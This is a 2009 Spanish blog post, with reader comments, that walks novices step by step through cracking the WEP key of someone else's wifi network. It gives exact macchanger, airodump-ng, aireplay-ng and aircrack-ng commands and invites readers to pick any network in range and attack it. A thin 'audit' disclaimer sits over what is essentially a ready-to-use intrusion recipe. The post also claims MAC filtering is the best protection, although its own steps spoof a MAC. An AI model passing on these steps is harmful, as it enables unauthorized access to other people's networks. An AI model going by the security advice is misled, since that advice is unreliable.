sábado, 31 de octubre de 2009

Auditoría wifi, conectate en plan pirata a una antena wifi paso por paso

Ante todo, decir que este documento es para que todos podais ver lo fácil que alguien puede conectarse a vuestra antena si no poneis seguridad.

Los siguientes pasos son para conectar a una antena wifi que está protegida por clave WEP, después de ver miles de sitios que explican de una forma más que técnica cómo se hace y que es necesario tener conocimientos extra, aquí verás cómo se hace paso por paso sin tener que saber nada más de la cuenta, es una guía para novatos.

Lo primero que hay que tener es un CD con el sistema operativo WIFIWAY, esto podeis hacerlo descargandolo desde el siguiente enlace, al final de la publicación está la descarga pulsando en la imágen que hay igual a la que se muestra unos renglones más abajo.

Ahora lo que hay que hacer es arrancar el portátil o equipo, que lógicamente tiene que tener conexión wifi, arrancando desde el CD el sistema WIFIWAY.




Los pasos a seguir son los siguientes:

1. Abrir una konsole (es la del icono de abajo de la pirámide de todos los que hay en la imagen).
2. Ejecutar uno por uno los siguientes comandos:
  •     ifconfig wlan0 down
  •     macchanger -m 00:11:22:33:44:55 wlan0
  •     ifconfig wlan0
  •     iwlist wlan0 scan
3. Bien, con la lista que ha salido en pantalla tenemos que crear un fichero de texto con el siguiente contenido, copialo de aquí, pégalo y modificalo grabandolo con el nombre "wpa.conf":

network={

ssid="WLAN_B5"
key_mgmt=NONE
bssid=00:01:38:91:98:CD
wep_key0="12345678990"
}


En este caso del listado anterior he puesto en ssid la WLAN_B5 que es una que encuentra mi portátil y también su bssid mostrada también en el listado de la ejecución anterior en konsole como 00:01:38:91:98:CD, elige tú la tuya que encuentres con buena cobertura y modifica el texto para crear tu fichero. IMPORTANTE, COPIA EL FICHERO EN EL ESCRITORIO Y AL ATAQUERRRR!!!

4. En el konsole abierto ejecuta lo siguiente:
    airmon-ng start wlan0 channel x
    (x=número de canal de la antena que también se veía en el listado mostrado anteriormente)

5. Abrir otro konsole y ejecutar:
    wpa_supplicant -c/root/Desktop/wpa.conf - Dwext -iwlan0

6. Abrir otro konsole y ejecutar:
    airodump-ng -w dexter-back -c x mon0
    (donde x=canal de antes)

7. Abrir otro konsole y ejecutar:
    aireplay-ng -3 -b MAC -h 00:11:22:33:44:55 mon0
    (reemplazar MAC por el bssid o mac de la antena que hemos visto antes)

8. Abrir otro konsole y ejecutar:
    aircrack-ng -z *.cap

Bueno, pues ya sólo falta esperar a que te muestre cual es la contraseña WEP de la antena para que puedas utilizarla para conectar. Lógicamente si la antena ofrece conexión a internet, pues te conectarás sin problema, prácticamente todas vienen configuradas para que por DHCP te conectes sin tener que configurar nada.

Cuando veais lo sencillo que es pensareis que vuestro sistema también está al alcance de cualquiera, aquí viene mi consejo. La mejor protección es por MAC, leer el manual de vuestro router-antena wifi y configurarlo para que sólamente puedan conectarse vuestros equipos indicando la MAC de los mismos.

8 comentarios:

  1. Muy buen manual, pero no seas pirata hombre, esto es sólo a nivel didáctico ;)

    ResponderEliminar
  2. Gracias, este artículo me lo he currado desde 0 con los conocimientos adquiridos y haciendo referencia a Soilo, un colega que se lo curró.

    Por supuesto y como no podría ser de otra manera, es sólamente para velar por la seguridad de todo el mundo... seguro que el que lo lea se dará cuenta de lo vendido que está con la seguridad que le ofrece de antemano la compañía que le brinda la adsl. ;)

    ResponderEliminar
  3. No tienes ni puta idea de lo que hablas ...

    ResponderEliminar
  4. Para empezar, ¿ me explicas que tiene que ver el wpa_supplicant con una cnexión WEP ? y ya puestos, ¿ las antenas tienes clave ?

    ResponderEliminar
  5. Veamos, se trata de un documento para hacer conexión a una antena wifi donde el método de seguridad es clave WEP. Tras buscar información en miles de sitios, en todos viene explicado de una forma muy técnica que segúramente tú no tendrás problema en entender por tus amplios conocimientos. Así que esta es una guía a seguir al pie de la letra, probada y funcional, para todo el que no sabe tanto sobre el tema.

    ResponderEliminar
  6. Pues yo he usado el wifiway 1.0 y es bastante más sencillo de lo aquí expuesto.

    Un saludo.

    ResponderEliminar
  7. yo tengo una antena wifi externa funcionara igual, soy bastante novato agradesco cualquier consejo gracias....

    ResponderEliminar